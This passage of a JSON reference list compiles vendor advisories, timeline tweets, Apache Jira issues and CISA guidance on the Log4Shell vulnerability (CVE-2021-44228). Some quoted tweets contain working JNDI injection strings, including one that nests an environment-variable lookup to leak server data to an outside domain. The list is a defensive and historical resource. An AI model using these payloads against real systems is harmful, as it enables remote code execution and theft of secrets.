},
{
"name": "Atlassian",
"type": "ADVISORY",
"url": "https://confluence.atlassian.com/kb/faq-for-cve-2021-44228-1103069406.html"
},
{
"name": "Automox",
"type": "ADVISORY",
"url": "https://blog.automox.com/log4j-critical-vulnerability-scores-a-10"
},
{
"name": "AWS",
"type": "ADVISORY",
"url": "https://aws.amazon.com/security/security-bulletins/AWS-2021-005/"
},
{
"name": "AZURE Datalake store java",
"type": "ADVISORY",
"url": "https://github.com/Azure/azure-data-lake-store-java/blob/ed5d6304783286c3cfff0a1dee457a922e23ad48/CHANGES.md#version-2310"
},
{
"name": "BACKBLAZE",
"type": "ADVISORY",
"url": "https://twitter.com/backblaze/status/1469477224277368838"
},
{
"name": "BitNami By VMware",
"type": "ADVISORY",
"url": "https://docs.bitnami.com/general/security/security-2021-12-10/"
},
{
"name": "Broadcom",
"type": "ADVISORY",
"url": "https://support.broadcom.com/security-advisory/content/security-advisories/Symantec-Security-Advisory-for-Log4j-2-CVE-2021-44228-Vulnerability/SYMSA19793"
},
{
"name": "CarbonBlack",
"type": "ADVISORY",
"url": "https://community.carbonblack.com/t5/Threat-Research-Docs/Log4Shell-Log4j-Remote-Code-Execution-CVE-2021-44228/ta-p/109134"
},
{
"name": "Cerberus FTP",
"type": "ADVISORY",
"url": "https://support.cerberusftp.com/hc/en-us/articles/4412448183571-Cerberus-is-not-affected-by-CVE-2021-44228-log4j-0-day-vulnerability"
},
{
"name": "CheckPoint",
"type": "ADVISORY",
"url": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=\u0026solutionid=sk176865\u0026partition=General\u0026product=IPS"
},
{
"name": "Cisco: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd",
"type": "ADVISORY",
"url": ""
},
{
"name": "Citrix",
"type": "ADVISORY",
"url": "https://support.citrix.com/article/CTX335705"
},
{
"name": "CloudFlare",
"type": "ADVISORY",
"url": "https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/"
},
{
"name": "CPanel",
"type": "ADVISORY",
"url": "https://forums.cpanel.net/threads/log4j-cve-2021-44228-does-it-affect-cpanel.696249/"
},
{
"name": "CommVault https://community.commvault.com/technical-q-a-2/log4j-been-used-in-commvault-1985?postid=11745#post11745",
"type": "ADVISORY",
"url": ""
},
{
"name": "Connect2id",
"type": "ADVISORY",
"url": "https://connect2id.com/blog/connect2id-server-12-5-1"
},
{
"name": "ConnectWise",
"type": "ADVISORY",
"url": "https://www.connectwise.com/company/trust/advisories"
},
{
"name": "ContrastSecurity",
"type": "ADVISORY",
"url": "https://support.contrastsecurity.com/hc/en-us/articles/4412612486548"
},
{
"name": "Coralogix",
"type": "ADVISORY",
"url": "https://twitter.com/Coralogix/status/1469713430659559425"
},
{
"name": "CouchBase",
"type": "ADVISORY",
"url": "https://forums.couchbase.com/t/ann-elasticsearch-connector-4-3-3-4-2-13-fixes-log4j-vulnerability/32402"
},
{
"name": "Cybereason",
"type": "ADVISORY",
"url": "https://www.cybereason.com/blog/cybereason-solutions-are-not-impacted-by-apache-log4j-vulnerability-cve-2021-44228"
},
{
"name": "Datto",
"type": "ADVISORY",
"url": "https://www.datto.com/blog/dattos-response-to-log4shell"
},
{
"name": "Debian",
"type": "ADVISORY",
"url": "https://security-tracker.debian.org/tracker/CVE-2021-44228"
},
{
"name": "Dell",
"type": "ADVISORY",
"url": "https://www.dell.com/support/kbdoc/fr-fr/000194372/dsn-2021-007-dell-response-to-apache-log4j-remote-code-execution-vulnerability"
},
{
"name": "Docker",
"type": "ADVISORY",
"url": "https://www.docker.com/blog/apache-log4j-2-cve-2021-44228/"
},
{
"name": "DropWizard",
"type": "ADVISORY",
"url": "https://twitter.com/dropwizardio/status/1469285337524580359"
},
{
"name": "DynaTrace",
"type": "ADVISORY",
"url": "https://community.dynatrace.com/t5/Dynatrace-Open-Q-A/Impact-of-log4j-zero-day-vulnerability/m-p/177259/highlight/true#M19282"
},
{
"name": "Eclipse Foundation",
"type": "ADVISORY",
"url": "https://git.eclipse.org/r/c/tracecompass/org.eclipse.tracecompass/+/188751"
},
{
"name": "Elastic",
"type": "ADVISORY",
"url": "https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476"
},
{
"name": "EVLLABS JGAAP",
"type": "ADVISORY",
"url": "https://github.com/evllabs/JGAAP/releases/tag/v8.0.2"
},
{
"name": "F5 Networks",
"type": "ADVISORY",
"url": "https://support.f5.com/csp/article/K19026212"
},
{
"name": "F-Secure https://status.f-secure.com/incidents/sk8vmr0h34pd",
"type": "ADVISORY",
"url": ""
},
{
"name": "Forescout",
"type": "ADVISORY",
"url": "https://forescout.force.com/support/s/article/Important-security-information-related-to-Apache-Log4j-utility-CVE-2021-44228"
},
{
"name": "FusionAuth",
"type": "ADVISORY",
"url": "https://fusionauth.io/blog/2021/12/10/log4j-fusionauth/"
},
{
"name": "Ghidra",
"type": "ADVISORY",
"url": "https://github.com/NationalSecurityAgency/ghidra/blob/2c73c72f0ba2720c6627be4005a721a5ebd64b46/README.md#warning"
},
{
"name": "GitHub",
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"name": "Atos Unify",
"type": "ADVISORY",
"url": "https://networks.unify.com/security/advisories/OBSO-2112-01"
},
{
"name": "GoAnywhere",
"type": "ADVISORY",
"url": "https://www.goanywhere.com/cve-2021-44228-goanywhere-mitigation-steps"
},
{
"name": "Google Cloud Armor WAF",
"type": "ADVISORY",
"url": "https://cloud.google.com/blog/products/identity-security/cloud-armor-waf-rule-to-help-address-apache-log4j-vulnerability"
},
{
"name": "GrayLog",
"type": "ADVISORY",
"url": "https://www.graylog.org/post/graylog-update-for-log4j"
},
{
"name": "GuardedBox",
"type": "ADVISORY",
"url": "https://twitter.com/GuardedBox/status/1469739834117799939"
},
{
"name": "HackerOne",
"type": "ADVISORY",
"url": "https://twitter.com/jobertabma/status/1469490881854013444"
},
{
"name": "Huawei",
"type": "ADVISORY",
"url": "https://www.huawei.com/en/psirt/security-notices/huawei-sn-20211210-01-log4j2-en"
},
{
"name": "HostiFi",
"type": "ADVISORY",
"url": "https://twitter.com/hostifi_net/status/1469511114824339464"
},
{
"name": "Informatica",
"type": "ADVISORY",
"url": "https://network.informatica.com/community/informatica-network/blog/2021/12/10/log4j-vulnerability-update"
},
{
"name": "Ivanti",
"type": "ADVISORY",
"url": "https://forums.ivanti.com/s/article/CVE-2021-44228-Java-logging-library-log4j-Ivanti-Products-Impact-Mapping?language=en_US"
},
{
"name": "Imperva",
"type": "ADVISORY",
"url": "https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/"
},
{
"name": "JAMF NATION",
"type": "ADVISORY",
"url": "https://community.jamf.com/t5/jamf-pro/third-party-security-issue/td-p/253740"
},
{
"name": "JazzSM DASH IBM",
"type": "ADVISORY",
"url": "https://www.ibm.com/support/pages/node/6525552"
},
{
"name": "Jenkins",
"type": "ADVISORY",
"url": "https://www.jenkins.io/blog/2021/12/10/log4j2-rce-CVE-2021-44228/"
},
{
"name": "JFROG",
"type": "ADVISORY",
"url": "https://twitter.com/jfrog/status/1469385793823199240"
},
{
"name": "Jitsi",
"type": "ADVISORY",
"url": "https://github.com/jitsi/security-advisories/blob/4e1ab58585a8a0593efccce77d5d0e22c5338605/advisories/JSA-2021-0004.md"
},
{
"name": "Keycloak",
"type": "ADVISORY",
"url": "https://github.com/keycloak/keycloak/discussions/9078"
},
{
"name": "Kafka Connect CosmosDB",
"type": "ADVISORY",
"url": "https://github.com/microsoft/kafka-connect-cosmosdb/blob/0f5d0c9dbf2812400bb480d1ff0672dfa6bb56f0/CHANGELOG.md"
},
{
"name": "LucentSKY",
"type": "ADVISORY",
"url": "https://twitter.com/LucentSky/status/1469358706311974914"
},
{
"name": "Lightbend",
"type": "ADVISORY",
"url": "https://discuss.lightbend.com/t/regarding-the-log4j2-vulnerability-cve-2021-44228/9275"
},
{
"name": "Macchina io",
"type": "ADVISORY",
"url": "https://twitter.com/macchina_io/status/1469611606569099269"
},
{
"name": "McAfee",
"type": "ADVISORY",
"url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=KB95091"
},
{
"name": "Metabase",
"type": "ADVISORY",
"url": "https://github.com/metabase/metabase/commit/8bfce98beb25e48830ac2bfd57432301c5e3ab37"
},
{
"name": "Minecraft",
"type": "ADVISORY",
"url": "https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition"
},
{
"name": "N-able",
"type": "ADVISORY",
"url": "https://www.n-able.com/security-and-privacy/apache-log4j-vulnerability"
},
{
"name": "NELSON",
"type": "ADVISORY",
"url": "https://github.com/getnelson/nelson/blob/f4d3dd1f1d4f8dfef02487f67aefb9c60ab48bf5/project/custom.scala"
},
{
"name": "NetApp",
"type": "ADVISORY",
"url": "https://security.netapp.com/advisory/ntap-20211210-0007/"
},
{
"name": "Netflix",
"type": "ADVISORY",
"url": "https://github.com/search?q=org%3ANetflix+CVE-2021-44228\u0026type=commits"
},
{
"name": "NextGen Healthcare Mirth",
"type": "ADVISORY",
"url": "https://github.com/nextgenhealthcare/connect/discussions/4892#discussioncomment-1789526"
},
{
"name": "Newrelic",
"type": "ADVISORY",
"url": "https://github.com/newrelic/newrelic-java-agent/issues/605"
},
{
"name": "Okta",
"type": "ADVISORY",
"url": "https://sec.okta.com/articles/2021/12/log4shell"
},
{
"name": "OpenHab",
"type": "ADVISORY",
"url": "https://github.com/openhab/openhab-distro/pull/1343"
},
{
"name": "OpenNMS",
"type": "ADVISORY",
"url": "https://www.opennms.com/en/blog/2021-12-10-opennms-products-affected-by-apache-log4j-vulnerability-cve-2021-44228/"
},
{
"name": "OpenSearch",
"type": "ADVISORY",
"url": "https://discuss.opendistrocommunity.dev/t/log4j-patch-for-cve-2021-44228/7950"
},
{
"name": "Oracle",
"type": "ADVISORY",
"url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"
},
{
"name": "Palo-Alto Networks",
"type": "ADVISORY",
"url": "https://security.paloaltonetworks.com/CVE-2021-44228"
},
{
"name": "PaperCut",
"type": "ADVISORY",
"url": "https://www.papercut.com/support/known-issues/#PO-684"
},
{
"name": "Positive Technologies",
"type": "ADVISORY",
"url": "https://twitter.com/ptsecurity/status/1469398376978522116"
},
{
"name": "Pulse Secure",
"type": "ADVISORY",
"url": "https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44933/?kA13Z000000L3dR"
},
{
"name": "Puppet",
"type": "ADVISORY",
"url": "https://puppet.com/blog/puppet-response-to-remote-code-execution-vulnerability-cve-2021-44228/"
},
{
"name": "Pure Storage",
"type": "ADVISORY",
"url": "https://support.purestorage.com/Field_Bulletins/Interim_Security_Advisory_Regarding_CVE-2021-44228_(%22log4j%22)"
},
{
"name": "Qlik",
"type": "ADVISORY",
"url": "https://community.qlik.com/t5/Support-Updates-Blog/Vulnerability-Testing-Apache-Log4j-reference-CVE-2021-44228-also/ba-p/1869368"
},
{
"name": "RedHat",
"type": "ADVISORY",
"url": "https://access.redhat.com/security/cve/cve-2021-44228"
},
{
"name": "RunDeck by PagerDuty",
"type": "ADVISORY",
"url": "https://docs.rundeck.com/docs/history/CVEs/"
},
{
"name": "RSA",
"type": "ADVISORY",
"url": "https://community.rsa.com/t5/general-security-advisories-and/rsa-customer-advisory-apache-vulnerability-log4j2-cve-2021-44228/ta-p/660501"
},
{
"name": "Rubrik",
"type": "ADVISORY",
"url": "https://support.rubrik.com/s/announcementdetail?Id=a406f000001PwOcAAK"
},
{
"name": "SailPoint",
"type": "ADVISORY",
"url": "https://community.sailpoint.com/t5/IdentityIQ-Blog/IdentityIQ-log4j-Remote-Code-Execution-Vulnerability/ba-p/206681"
},
{
"name": "Salesforce",
"type": "ADVISORY",
"url": "https://help.salesforce.com/s/articleView?id=000363736\u0026type=1"
},
{
"name": "Security Onion",
"type": "ADVISORY",
"url": "https://blog.securityonion.net/2021/12/security-onion-2390-20211210-hotfix-now.html"
},
{
"name": "ServiceNow",
"type": "ADVISORY",
"url": "https://support.servicenow.com/kb?id=kb_article_view\u0026sysparm_article=KB1000959"
},
{
"name": "Sesam Info",
"type": "ADVISORY",
"url": "https://twitter.com/sesam_info/status/1469711992122486791"
},
{
"name": "Shibboleth",
"type": "ADVISORY",
"url": "http://shibboleth.net/pipermail/announce/2021-December/000253.html"
},
{
"name": "SLF4J",
"type": "ADVISORY",
"url": "http://slf4j.org/log4shell.html"
},
{
"name": "SmileCDR",
"type": "ADVISORY",
"url": "https://www.smilecdr.com/our-blog/a-statement-on-log4shell-cve-2021-44228"
},
{
"name": "Sophos",
"type": "ADVISORY",
"url": "https://www.sophos.com/en-us/security-advisories/sophos-sa-20211210-log4j-rce"
},
{
"name": "SonarSource",
"type": "ADVISORY",
"url": "https://community.sonarsource.com/t/sonarqube-and-the-log4j-vulnerability/54721"
},
{
"name": "SonicWall",
"type": "ADVISORY",
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"
},
{
"name": "Spring Boot",
"type": "ADVISORY",
"url": "https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot"
},
{
"name": "SUSE",
"type": "ADVISORY",
"url": "https://www.suse.com/security/cve/CVE-2021-44228.html"
},
{
"name": "Sterling Order IBM",
"type": "ADVISORY",
"url": "https://www.ibm.com/support/pages/node/6525544"
},
{
"name": "Swingset",
"type": "ADVISORY",
"url": "https://github.com/bpangburn/swingset/blob/017452b2d0d8370871f43a68043dacf53af7f759/swingset/CHANGELOG.txt#L10"
},
{
"name": "Talend",
"type": "ADVISORY",
"url": "https://jira.talendforge.org/browse/TCOMP-2054"
},
{
"name": "Tanium",
"type": "ADVISORY",
"url": "https://community.tanium.com/s/article/How-Tanium-Can-Help-with-CVE-2021-44228-Log4Shell"
},
{
"name": "TrendMicro",
"type": "ADVISORY",
"url": "https://success.trendmicro.com/solution/000289940"
},
{
"name": "Ubiquiti-UniFi-UI",
"type": "ADVISORY",
"url": "https://community.ui.com/releases/UniFi-Network-Application-6-5-54/d717f241-48bb-4979-8b10-99db36ddabe1"
},
{
"name": "Vespa ENGINE",
"type": "ADVISORY",
"url": "https://github.com/vespa-engine/blog/blob/f281ce4399ed3e97b4fed32fcc36f9ba4b17b1e2/_posts/2021-12-10-log4j-vulnerability.md"
},
{
"name": "VMware",
"type": "ADVISORY",
"url": "https://www.vmware.com/security/advisories/VMSA-2021-0028.html"
},
{
"name": "Wallarm",
"type": "ADVISORY",
"url": "https://lab.wallarm.com/cve-2021-44228-mitigation-update/"
},
{
"name": "Wowza",
"type": "ADVISORY",
"url": "https://www.wowza.com/docs/known-issues-with-wowza-streaming-engine#log4j2-cve"
},
{
"name": "Yandex-Cloud",
"type": "ADVISORY",
"url": "https://github.com/yandex-cloud/docs/blob/6ff6c676787756e7dd6101c53b051e4cd04b3e85/ru/overview/security-bulletins/index.md#10122021--cve-2021-44228--%D1%83%D0%B4%D0%B0%D0%BB%D0%B5%D0%BD%D0%BD%D0%BE%D0%B5-%D0%B2%D1%8B%D0%BF%D0%BE%D0%BB%D0%BD%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BA%D0%BE%D0%B4%D0%B0-log4shell-apache-log4j"
},
{
"name": "ZAMMAD",
"type": "ADVISORY",
"url": "https://community.zammad.org/t/cve-2021-44228-elasticsearch-users-be-aware/8256"
},
{
"name": "Zaproxy",
"type": "ADVISORY",
"url": "https://www.zaproxy.org/blog/2021-12-10-zap-and-log4shell/"
},
{
"name": "ZSCALER",
"type": "ADVISORY",
"url": "https://www.zscaler.fr/blogs/security-research/security-advisory-log4j-0-day-remote-code-execution-vulnerability-cve-2021"
},
{
"name": "Canadian Centre for Cyber Security - Statement from the Minister of National Defence on Apache Vulnerability and Call to Canadian Organizations to Take Urgent Action",
"type": "EVIDENCE",
"url": "https://cyber.gc.ca/en/news/statement-minister-national-defence-apache-vulnerability"
},
{
"name": "https://twitter.com/CyberRaiju/status/1469505677580124160",
"type": "EVIDENCE",
"url": "https://twitter.com/CyberRaiju/status/1469505677580124160"
},
{
"name": "https://twitter.com/0gtweet/status/1469661769547362305",
"type": "EVIDENCE",
"url": "https://twitter.com/0gtweet/status/1469661769547362305"
},
{
"name": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/",
"type": "FIX",
"url": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/"
},
{
"name": "Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation",
"type": "EVIDENCE",
"url": "https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/"
},
{
"name": "https://www.docker.com/blog/apache-log4j-2-cve-2021-44228/",
"type": "FIX",
"url": "https://www.docker.com/blog/apache-log4j-2-cve-2021-44228/"
},
{
"name": "https://twitter.com/yazicivo/status/1469349956880408583",
"type": "EVIDENCE",
"url": "https://twitter.com/yazicivo/status/1469349956880408583"
},
{
"name": "log4j: between a rock and a hard places",
"type": "EVIDENCE",
"url": "https://crawshaw.io/blog/log4j"
},
{
"name": "Log4j: Between a rock and a hard place - comments",
"type": "EVIDENCE",
"url": "https://news.ycombinator.com/item?id=29523608"
},
{
"content": "Dumped my Log4J Yara rules here: https://github.com/timb-machine/log4j/. Rather than look for vulnerable code, the primary idea was to identify projects that are pulling Log4J in.",
"name": "https://twitter.com/timb_machine/status/1470091290289352704",
"timestamp": "2021-12-12T18:00",
"type": "EVIDENCE",
"url": "https://twitter.com/timb_machine/status/1470091290289352704"
},
{
"name": "Yara rules for log4j",
"type": "EVIDENCE",
"url": "https://github.com/timb-machine/log4j/"
},
{
"content": "#log4j\n${jndi:ldap://xxxxx.dnslog.cn/exp}",
"name": "https://hypixel.net/threads/psa-there-is-a-fatal-remote-code-execution-exploit-in-minecraft-and-its-by-typing-in-chat.4703238/",
"tags": [
"timeline"
],
"timestamp": "2021-12-09T05:49TZ??",
"type": "EVIDENCE",
"url": "https://hypixel.net/threads/psa-there-is-a-fatal-remote-code-execution-exploit-in-minecraft-and-its-by-typing-in-chat.4703238/"
},
{
"name": "https://old.reddit.com/r/programming/comments/rcxehp/rce_0day_exploit_found_in_log4j_a_popular_java/",
"type": "EVIDENCE",
"url": "https://old.reddit.com/r/programming/comments/rcxehp/rce_0day_exploit_found_in_log4j_a_popular_java/"
},
{
"content": "#log4j\n${jndi:ldap://xxxxx.dnslog.cn/exp}",
"name": "https://twitter.com/sirifu4k1/status/1468951859381485573",
"tags": [
"timeline",
"#log4j",
"first_tweet"
],
"timestamp": "2021-12-09T14:33",
"type": "EVIDENCE",
"url": "https://twitter.com/sirifu4k1/status/1468951859381485573"
},
{
"content": "#log4j \u96be\u4ee5\u60f3\u8c61\uff0c\u8fd9\u6837\u4e00\u4e2a RCE \u6f0f\u6d1e\u5728\u534a\u4e2a\u591a\u6708\u524d\u88ab\u53d1\u73b0\uff0c5\u5929\u524d\u88ab\u4fee\u590d\uff0c\u7ed3\u679c\u5230\u4eca\u5929\u8fde CVE \u90fd\u6ca1\u6709\uff0c\u8fde\u65b0\u7684\u6b63\u5f0f Release \u90fd\u6ca1\u53d1\u3002",
"name": "https://twitter.com/CattusGlavo/status/1469010118163374089",
"tags": [
"timeline",
"#log4j"
],
"timestamp": "2021-12-09T18:24",
"type": "EVIDENCE",
"url": "https://twitter.com/CattusGlavo/status/1469010118163374089"
},
{
"content": "\ud83d\udd25 Patch log4j NOW ! \ud83d\udd25 CVE-2021-44228 \ud83d\udd25 Path: log4j-2.15.0-rc1 and log4j-2.15.0-rc2 Set log4j2.formatMsgNoLookups to true. #log4j #apache #RCE #Log4Shell",
"name": "https://twitter.com/domineefh/status/1469237240341704705",
"tags": [
"timeline",
"#log4shell"
],
"timestamp": "2021-12-10T09:27",
"type": "EVIDENCE",
"url": "https://twitter.com/domineefh/status/1469237240341704705"
},
{
"content": "RCE 0-day exploit found in log4j, a popular Java logging package https://lunasec.io/docs/blog/log4j-zero-day/",
"name": "https://twitter.com/_r_netsec/status/1469120458083962882",
"tags": [
"timeline"
],
"timestamp": "2021-12-10T01:43",
"type": "EVIDENCE",
"url": "https://twitter.com/_r_netsec/status/1469120458083962882"
},
{
"content": "#log4j Using -Dlog4j2.formatMsgNoLookups=true to disable message pattern lookup can solve this problem, but if you rely on it, please update your log4j2 as soon as possible.",
"name": "https://twitter.com/CattusGlavo/status/14690131867413012499",
"tags": [
"timeline",
"#log4j"
],
"timestamp": "2021-12-09T18:36",
"type": "FIX",
"url": "https://twitter.com/CattusGlavo/status/1469013186741301249"
},
{
"content": "Worst Log4j RCE Zeroday Dropped on Internet https://cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html #apache #log4j #bugbounty #security #SecurityBreach #cybersecurity",
"name": "https://twitter.com/cyberkendra/status/1469028640511836163",
"tags": [
"timeline",
"#log4j"
],
"timestamp": "2021-12-09T19:38",
"type": "EVIDENCE",
"url": "https://twitter.com/cyberkendra/status/1469028640511836163"
},
{
"content": "#log4j ${jndi:ldap:// \u8fd9\u6f0f\u6d1e\u6709\u70b9\u6050\u6016\uff0c\u8fd8\u5728\u7528\u65e7\u7248JDK\u7684\u8981\u6ce8\u610f\u4e86y",
"name": "https://twitter.com/h113sdx/status/1469010902183661568",
"tags": [
"timeline",
"#log4j"
],
"timestamp": "2021-12-09T18:27",
"type": "EVIDENCE",
"url": "https://twitter.com/h113sdx/status/1469010902183661568"
},
{
"content": "We wrote up a summary on the log4j 0-day that was found earlier today. This is going to be fun for a lot of people scrambling to patch this tonight!",
"name": "https://twitter.com/freeqaz/status/1469121757361569793",
"tags": [
"timeline"
],
"timestamp": "2021-12-10T01:48",
"type": "EVIDENCE",
"url": "https://twitter.com/freeqaz/status/1469121757361569793"
},
{
"content": "Earliest evidence we\u2019ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don\u2019t see evidence of mass exploitation until after public disclosure.",
"name": "https://twitter.com/eastdakota/status/1469800951351427073",
"tags": [
"timeline"
],
"timestamp": "2021-12-11T10:47",
"type": "EVIDENCE",
"url": "https://twitter.com/eastdakota/status/1469800951351427073"
},
{
"content": "@GreyNoise is currently seeing 2 unique IP\u0027s scanning the internet for the new Apache Log4j RCE vulnerability (No CVE assigned yet). A tag to track this activity on http://greynoise.io will be made available shortly and linked as a reply when released.",
"name": "https://twitter.com/_mattata/status/1469144854672379905",
"tags": [
"timeline"
],
"timestamp": "2021-12-09",
"type": "EVIDENCE",
"url": "https://twitter.com/_mattata/status/1469144854672379905"
},
{
"name": "Restrict LDAP access via JNDI #608",
"tags": [
"timeline"
],
"timestamp": "2021-11-30",
"type": "EVIDENCE",
"url": "https://github.com/apache/logging-log4j2/pull/608"
},
{
"content": "Dealing with CVE-2021-44228 has shown the JNDI has significant security issues. While we have mitigated what we are aware of it would be safer for users to completely disable it by default, especially since the large majority are unlikely to be using it. Those who are will need to specify -Dlog4j2.enableJndi=true or the environment variable form of it to use any JNDI components.",
"name": "LOG4J2-3208 Disable JNDI by default",
"tags": [
"timeline"
],
"timestamp": "2021-12-11",
"type": "EVIDENCE",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3208"
},
{
"content": "LDAP needs to be limited in the servers and classes it can access. JNDI should only support the java, ldap, and ldaps protocols by default.",
"name": "LOG4J2-3201 Limit the protocols jNDI can use and restrict LDAP.",
"tags": [
"timeline"
],
"timestamp": "2021-12-05",
"type": "EVIDENCE",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3201"
},
{
"content": "As opposed to setting \"%m {nolookups}\" in all pattern definitions, I would like to globally disable the feature",
"name": "LOG4J2-2109 Add property to disable message pattern converter lookups",
"tags": [
"timeline"
],
"timestamp": "2017-11-09T13:25",
"type": "EVIDENCE",
"url": "https://issues.apache.org/jira/browse/LOG4J2-2109"
},
{
"content": "In page \"Configuration\", section \"Property Substitution\", it would be nice to add \"jndi\" context in the table listing all possible contexts. Because natively, log4j2 supports property substitution using jndi variables. It\u0027s too bad to not mention it into documentation.",
"name": "LOG4J2-1133 In page \"Configuration\", section \"Property Substitution\", add \"jndi\" context",
"tags": [
"timeline"
],
"timestamp": "2015-09-15T16:58",
"type": "EVIDENCE",
"url": "https://issues.apache.org/jira/browse/LOG4J2-1133"
},
{
"content": "Currently, Lookup plugins [1] don\u0027t support JNDI resources. It would be really convenient to support JNDI resource lookup in the configuration. One use case with JNDI lookup plugin is as follows: I\u0027d like to use RoutingAppender [2] to put all the logs from the same web application context in a log file (a log file per web application context). And, I want to use JNDI resources look up to determine the target route (similarly to JNDI context selector of logback [3]). Determining the target route by JNDI lookup can be advantageous because we don\u0027t have to add any code to set properties for the thread context and JNDI lookup should always work even in a separate thread without copying thread context variables.",
"name": "LOG4J2-313 JNDI Lookup plugin support",
"tags": [
"timeline"
],
"timestamp": "2013-07-17",
"type": "EVIDENCE",
"url": "https://issues.apache.org/jira/browse/LOG4J2-313"
},
{
"name": "Log4Shell scanner for Burp Suite",
"type": "EVIDENCE",
"url": "https://github.com/silentsignal/burp-log4shell"
},
{
"name": "https://blog.silentsignal.eu/2021/12/12/our-new-tool-for-enumerating-hidden-log4shell-affected-hosts/",
"type": "EVIDENCE",
"url": "https://blog.silentsignal.eu/2021/12/12/our-new-tool-for-enumerating-hidden-log4shell-affected-hosts/"
},
{
"name": "https://twitter.com/_StaticFlow_/status/1469358229767475205",
"timestamp": "2021-12-10T18:27",
"type": "EVIDENCE",
"url": "In case anyone hasn\u0027t discovered this. The Log4J formatting is nestable which means payloads like \"${jndi:ldap://${env:user}.xyz.collab.com/a}\" Will leak server side env vars!"
},
{
"name": "Panorama 10.1 OSS Listing",
"type": "ADVISORY",
"url": "https://docs.paloaltonetworks.com/oss-listings/panorama-oss-listings/panorama-10-1-open-source-software-oss-listing.html"
},
{
"name": "UniFi Network Application 6.5.54",
"type": "ADVISORY",
"url": "https://community.ui.com/releases/UniFi-Network-Application-6-5-54/d717f241-48bb-4979-8b10-99db36ddabe1"
},
{
"name": "https://twitter.com/tnpitsecurity/status/1469429810216771589",
"timestamp": "2021-12-10T11:12",
"type": "ADVISORY",
"url": "e can confirm that VMWare vCenter is affected by the Log4j vulnerability. #log4j #vcenter #Log4Shell"
},
{
"name": "https://github.com/xiajun325/apache-log4j-rce-poc",
"type": "EVIDENCE",
"url": "https://github.com/xiajun325/apache-log4j-rce-poc"
},
{
"name": "https://www.reddit.com/r/crowdstrike/comments/rda0ls/20211210_cool_query_friday_hunting_apache_log4j/",
"type": "EVIDENCE",
"url": "https://www.reddit.com/r/crowdstrike/comments/rda0ls/20211210_cool_query_friday_hunting_apache_log4j/"
},
{
"name": "https://github.com/PortSwigger/active-scan-plus-plus/commit/b485a0744140533d877ce244603502b42f9c6656",
"type": "EVIDENCE",
"url": "https://github.com/PortSwigger/active-scan-plus-plus/commit/b485a0744140533d877ce244603502b42f9c6656"
},
{
"content": "You can run these queries on @sourcegraph to determine the scope of impact of the log4j 0-day on your code:",
"name": "https://twitter.com/beyang/status/1469171471784329219",
"type": "EVIDENCE",
"url": "https://twitter.com/beyang/status/1469171471784329219"
},
{
"name": "https://semgrep.dev/r?q=log4j-message-lookup-injection",
"type": "EVIDENCE",
"url": "https://semgrep.dev/r?q=log4j-message-lookup-injection"
},
{
"name": "https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j",
"type": "EVIDENCE",
"url": "https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j"
},
{
"name": "https://www.reddit.com/r/netsec/comments/rcwws9/rce_0day_exploit_found_in_log4j_a_popular_java/",
"type": "EVIDENCE",
"url": "https://www.reddit.com/r/netsec/comments/rcwws9/rce_0day_exploit_found_in_log4j_a_popular_java/"
},
{
"name": "https://www.govcert.admin.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/",
"type": "EVIDENCE",
"url": "https://www.govcert.admin.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/"
},
{
"name": "CISA Creates Webpage for Apache Log4j Vulnerability CVE-2021-44228",
"type": "EVIDENCE",
"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/13/cisa-creates-webpage-apache-log4j-vulnerability-cve-2021-44228"
},
{
"name": "CISA - Apache Log4j Vulnerability Guidance",
"type": "EVIDENCE",
"url": "https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance"
},
{
"name": "CISA Log4j (CVE-2021-44228) Vulnerability Guidance",
"type": "EVIDENCE",
"url": "https://github.com/cisagov/log4j-affected-db"
},
{
"name": "The FTC Wants Companies to Find Log4j Fast. It Won\u0027t Be Easy",
"type": "ARTICLE",
"url": "https://www.wired.com/story/lo4j-ftc-vulnerability/"
},
{
"name": "CISA director: We\u0027ll be dealing with Log4j for a long time",
"type": "ARTICLE",
"url": "https://www.cnet.com/tech/services-and-software/cisa-director-well-be-dealing-with-log4j-for-a-long-time/#ftag=CAD590a51e"
},
{
